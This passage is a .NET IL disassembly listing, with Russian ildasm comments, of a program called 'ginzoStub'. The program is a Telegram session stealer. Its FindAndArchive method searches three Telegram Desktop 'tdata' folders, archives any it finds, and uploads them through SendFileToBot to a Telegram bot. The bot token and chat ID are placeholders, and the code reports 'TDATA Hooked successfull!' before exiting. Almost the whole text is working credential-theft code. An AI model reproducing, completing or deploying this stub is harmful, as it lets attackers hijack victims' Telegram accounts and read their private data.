              IL_010d:  stfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
              IL_0112:  ldloca.s   V_2
              IL_0114:  call       instance !0 valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage>::GetResult()
              IL_0119:  callvirt   instance class [System.Net.Http]System.Net.Http.HttpResponseMessage [System.Net.Http]System.Net.Http.HttpResponseMessage::EnsureSuccessStatusCode()
              IL_011e:  pop
              IL_011f:  leave.s    IL_0139

            }  // end .try
            finally
            {
              IL_0121:  ldloc.0
              IL_0122:  ldc.i4.0
              IL_0123:  bge.s      IL_0138

              IL_0125:  ldarg.0
              IL_0126:  ldfld      class [mscorlib]System.IO.FileStream ginzoStub.Program/'<SendFileToBot>d__1'::'<fileStream>5__4'
              IL_012b:  brfalse.s  IL_0138

              IL_012d:  ldarg.0
              IL_012e:  ldfld      class [mscorlib]System.IO.FileStream ginzoStub.Program/'<SendFileToBot>d__1'::'<fileStream>5__4'
              IL_0133:  callvirt   instance void [mscorlib]System.IDisposable::Dispose()
              IL_0138:  endfinally
            }  // end handler
            IL_0139:  ldarg.0
            IL_013a:  ldnull
            IL_013b:  stfld      class [mscorlib]System.IO.FileStream ginzoStub.Program/'<SendFileToBot>d__1'::'<fileStream>5__4'
            IL_0140:  leave.s    IL_015a

          }  // end .try
          finally
          {
            IL_0142:  ldloc.0
            IL_0143:  ldc.i4.0
            IL_0144:  bge.s      IL_0159

            IL_0146:  ldarg.0
            IL_0147:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
            IL_014c:  brfalse.s  IL_0159

            IL_014e:  ldarg.0
            IL_014f:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
            IL_0154:  callvirt   instance void [mscorlib]System.IDisposable::Dispose()
            IL_0159:  endfinally
          }  // end handler
          IL_015a:  ldarg.0
          IL_015b:  ldnull
          IL_015c:  stfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
          IL_0161:  leave.s    IL_017b

        }  // end .try
        finally
        {
          IL_0163:  ldloc.0
          IL_0164:  ldc.i4.0
          IL_0165:  bge.s      IL_017a

          IL_0167:  ldarg.0
          IL_0168:  ldfld      class [System.Net.Http]System.Net.Http.HttpClient ginzoStub.Program/'<SendFileToBot>d__1'::'<client>5__2'
          IL_016d:  brfalse.s  IL_017a

          IL_016f:  ldarg.0
          IL_0170:  ldfld      class [System.Net.Http]System.Net.Http.HttpClient ginzoStub.Program/'<SendFileToBot>d__1'::'<client>5__2'
          IL_0175:  callvirt   instance void [mscorlib]System.IDisposable::Dispose()
          IL_017a:  endfinally
        }  // end handler
        IL_017b:  ldarg.0
        IL_017c:  ldnull
        IL_017d:  stfld      class [System.Net.Http]System.Net.Http.HttpClient ginzoStub.Program/'<SendFileToBot>d__1'::'<client>5__2'
        IL_0182:  leave.s    IL_019b

      }  // end .try
      catch [mscorlib]System.Exception 
      {
        IL_0184:  stloc.3
        IL_0185:  ldarg.0
        IL_0186:  ldc.i4.s   -2
        IL_0188:  stfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
        IL_018d:  ldarg.0
        IL_018e:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
        IL_0193:  ldloc.3
        IL_0194:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetException(class [mscorlib]System.Exception)
        IL_0199:  leave.s    IL_01ae

      }  // end handler
      IL_019b:  ldarg.0
      IL_019c:  ldc.i4.s   -2
      IL_019e:  stfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
      IL_01a3:  ldarg.0
      IL_01a4:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
      IL_01a9:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetResult()
      IL_01ae:  ret
    } // end of method '<SendFileToBot>d__1'::MoveNext

    .method private hidebysig newslot virtual final 
            instance void  SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine stateMachine) cil managed
    {
      .custom instance void [mscorlib]System.Diagnostics.DebuggerHiddenAttribute::.ctor() = ( 01 00 00 00 ) 
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::SetStateMachine
      // Размер кода:       13 (0xd)
      .maxstack  8
      IL_0000:  ldarg.0
      IL_0001:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
      IL_0006:  ldarg.1
      IL_0007:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine)
      IL_000c:  ret
    } // end of method '<SendFileToBot>d__1'::SetStateMachine

  } // end of class '<SendFileToBot>d__1'

  .method private hidebysig static class [mscorlib]System.Threading.Tasks.Task 
          Main(string[] args) cil managed
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.AsyncStateMachineAttribute::.ctor(class [mscorlib]System.Type) = ( 01 00 1C 67 69 6E 7A 6F 53 74 75 62 2E 50 72 6F   // ...ginzoStub.Pro
                                                                                                                                       67 72 61 6D 2B 3C 4D 61 69 6E 3E 64 5F 5F 30 00   // gram+<Main>d__0.
                                                                                                                                       00 ) 
    // Размер кода:       47 (0x2f)
    .maxstack  2
    .locals init (valuetype ginzoStub.Program/'<Main>d__0' V_0)
    IL_0000:  ldloca.s   V_0
    IL_0002:  call       valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Create()
    IL_0007:  stfld      valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
    IL_000c:  ldloca.s   V_0
    IL_000e:  ldc.i4.m1
    IL_000f:  stfld      int32 ginzoStub.Program/'<Main>d__0'::'<>1__state'
    IL_0014:  ldloca.s   V_0
    IL_0016:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
    IL_001b:  ldloca.s   V_0
    IL_001d:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Start<valuetype ginzoStub.Program/'<Main>d__0'>(!!0&)
    IL_0022:  ldloca.s   V_0
    IL_0024:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
    IL_0029:  call       instance class [mscorlib]System.Threading.Tasks.Task [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::get_Task()
    IL_002e:  ret
  } // end of method Program::Main

  .method private hidebysig static class [mscorlib]System.Threading.Tasks.Task 
          SendFileToBot(string filePath,
                        string chatId,
                        string botToken,
                        string message) cil managed
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.AsyncStateMachineAttribute::.ctor(class [mscorlib]System.Type) = ( 01 00 25 67 69 6E 7A 6F 53 74 75 62 2E 50 72 6F   // ..%ginzoStub.Pro
                                                                                                                                       67 72 61 6D 2B 3C 53 65 6E 64 46 69 6C 65 54 6F   // gram+<SendFileTo
                                                                                                                                       42 6F 74 3E 64 5F 5F 31 00 00 )                   // Bot>d__1..
    // Размер кода:       79 (0x4f)
    .maxstack  2
    .locals init (valuetype ginzoStub.Program/'<SendFileToBot>d__1' V_0)
    IL_0000:  ldloca.s   V_0
    IL_0002:  call       valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Create()
    IL_0007:  stfld      valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
    IL_000c:  ldloca.s   V_0
    IL_000e:  ldarg.0
    IL_000f:  stfld      string ginzoStub.Program/'<SendFileToBot>d__1'::filePath
    IL_0014:  ldloca.s   V_0
    IL_0016:  ldarg.1
    IL_0017:  stfld      string ginzoStub.Program/'<SendFileToBot>d__1'::chatId
    IL_001c:  ldloca.s   V_0
    IL_001e:  ldarg.2
    IL_001f:  stfld      string ginzoStub.Program/'<SendFileToBot>d__1'::botToken
    IL_0024:  ldloca.s   V_0
    IL_0026:  ldarg.3
    IL_0027:  stfld      string ginzoStub.Program/'<SendFileToBot>d__1'::message
    IL_002c:  ldloca.s   V_0
    IL_002e:  ldc.i4.m1
    IL_002f:  stfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
    IL_0034:  ldloca.s   V_0
    IL_0036:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
    IL_003b:  ldloca.s   V_0
    IL_003d:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Start<valuetype ginzoStub.Program/'<SendFileToBot>d__1'>(!!0&)
    IL_0042:  ldloca.s   V_0
    IL_0044:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
    IL_0049:  call       instance class [mscorlib]System.Threading.Tasks.Task [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::get_Task()
    IL_004e:  ret
  } // end of method Program::SendFileToBot

  .method private hidebysig static class [mscorlib]System.Threading.Tasks.Task 
          ArchiveAndSendAsync(string folderPath,
                              string chatId,
                              string botToken,
                              string message) cil managed
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.AsyncStateMachineAttribute::.ctor(class [mscorlib]System.Type) = ( 01 00 2B 67 69 6E 7A 6F 53 74 75 62 2E 50 72 6F   // ..+ginzoStub.Pro
                                                                                                                                       67 72 61 6D 2B 3C 41 72 63 68 69 76 65 41 6E 64   // gram+<ArchiveAnd
                                                                                                                                       53 65 6E 64 41 73 79 6E 63 3E 64 5F 5F 32 00 00 ) // SendAsync>d__2..
    // Размер кода:       79 (0x4f)
    .maxstack  2
    .locals init (valuetype ginzoStub.Program/'<ArchiveAndSendAsync>d__2' V_0)
    IL_0000:  ldloca.s   V_0
    IL_0002:  call       valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Create()
    IL_0007:  stfld      valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
    IL_000c:  ldloca.s   V_0
    IL_000e:  ldarg.0
    IL_000f:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::folderPath
    IL_0014:  ldloca.s   V_0
    IL_0016:  ldarg.1
    IL_0017:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::chatId
    IL_001c:  ldloca.s   V_0
    IL_001e:  ldarg.2
    IL_001f:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::botToken
    IL_0024:  ldloca.s   V_0
    IL_0026:  ldarg.3
    IL_0027:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::message
    IL_002c:  ldloca.s   V_0
    IL_002e:  ldc.i4.m1
    IL_002f:  stfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
    IL_0034:  ldloca.s   V_0
    IL_0036:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
    IL_003b:  ldloca.s   V_0
    IL_003d:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::Start<valuetype ginzoStub.Program/'<ArchiveAndSendAsync>d__2'>(!!0&)
    IL_0042:  ldloca.s   V_0
    IL_0044:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
    IL_0049:  call       instance class [mscorlib]System.Threading.Tasks.Task [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::get_Task()
    IL_004e:  ret
  } // end of method Program::ArchiveAndSendAsync

  .method private hidebysig static void  FindAndArchive() cil managed
  {
    // Размер кода:       109 (0x6d)
    .maxstack  5
    .locals init (string V_0,
             string V_1,
             string[] V_2,
             int32 V_3,
             string V_4)
    IL_0000:  ldstr      "KINGTOKENBOT"
    IL_0005:  stloc.0
    IL_0006:  ldstr      "KINGCHATID"
    IL_000b:  stloc.1
    IL_000c:  ldc.i4.3
    IL_000d:  newarr     [mscorlib]System.String
    IL_0012:  dup
    IL_0013:  ldc.i4.0
    IL_0014:  ldstr      "D:\\Telegram Desktop\\tdata"
    IL_0019:  stelem.ref
    IL_001a:  dup
    IL_001b:  ldc.i4.1
    IL_001c:  ldc.i4.s   40
    IL_001e:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
    IL_0023:  ldstr      "AppData\\Roaming\\Telegram Desktop\\tdata"
    IL_0028:  call       string [mscorlib]System.IO.Path::Combine(string,
                                                                  string)
    IL_002d:  stelem.ref
    IL_002e:  dup
    IL_002f:  ldc.i4.2
    IL_0030:  ldstr      "C:\\Program Files\\Telegram Desktop\\tdata"
    IL_0035:  stelem.ref
    IL_0036:  stloc.2
    IL_0037:  ldc.i4.0
    IL_0038:  stloc.3
    IL_0039:  br.s       IL_0066

    IL_003b:  ldloc.2
    IL_003c:  ldloc.3
    IL_003d:  ldelem.ref
    IL_003e:  stloc.s    V_4
    IL_0040:  ldloc.s    V_4
    IL_0042:  call       bool [mscorlib]System.IO.Directory::Exists(string)
    IL_0047:  brfalse.s  IL_0062

    IL_0049:  ldloc.s    V_4
    IL_004b:  ldloc.1
    IL_004c:  ldloc.0
    IL_004d:  ldstr      "+---------------NEW LOG-----------+\n\nTDATA Hooked "
    + "successfull!\n\n+---------------NEW LOG-----------+"
    IL_0052:  call       class [mscorlib]System.Threading.Tasks.Task ginzoStub.Program::ArchiveAndSendAsync(string,
                                                                                                            string,
                                                                                                            string,
                                                                                                            string)
    IL_0057:  callvirt   instance void [mscorlib]System.Threading.Tasks.Task::Wait()
    IL_005c:  ldc.i4.0
    IL_005d:  call       void [mscorlib]System.Environment::Exit(int32)
    IL_0062:  ldloc.3
    IL_0063:  ldc.i4.1
    IL_0064:  add
    IL_0065:  stloc.3
    IL_0066:  ldloc.3
    IL_0067:  ldloc.2
    IL_0068:  ldlen
    IL_0069:  conv.i4
    IL_006a:  blt.s      IL_003b

    IL_006c:  ret
  } // end of method Program::FindAndArchive

  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Размер кода:       7 (0x7)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  call       instance void [mscorlib]System.Object::.ctor()
    IL_0006:  ret
  } // end of method Program::.ctor

  .method private hidebysig specialname static 
          void  '<Main>'(string[] args) cil managed
  {
    .entrypoint
    // Размер кода:       20 (0x14)
    .maxstack  1
    .locals init (valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter V_0)
    IL_0000:  ldarg.0
    IL_0001:  call       class [mscorlib]System.Threading.Tasks.Task ginzoStub.Program::Main(string[])
    IL_0006:  callvirt   instance valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter [mscorlib]System.Threading.Tasks.Task::GetAwaiter()
    IL_000b:  stloc.0
    IL_000c:  ldloca.s   V_0
    IL_000e:  call       instance void [mscorlib]System.Runtime.CompilerServices.TaskAwaiter::GetResult()
    IL_0013:  ret
  } // end of method Program::'<Main>'

} // end of class ginzoStub.Program


// =============================================================

// *********** ДИЗАССЕМБЛИРОВАНИЕ ЗАВЕРШЕНО ***********************
// ВНИМАНИЕ: создан файл ресурсов Win32 stub.res
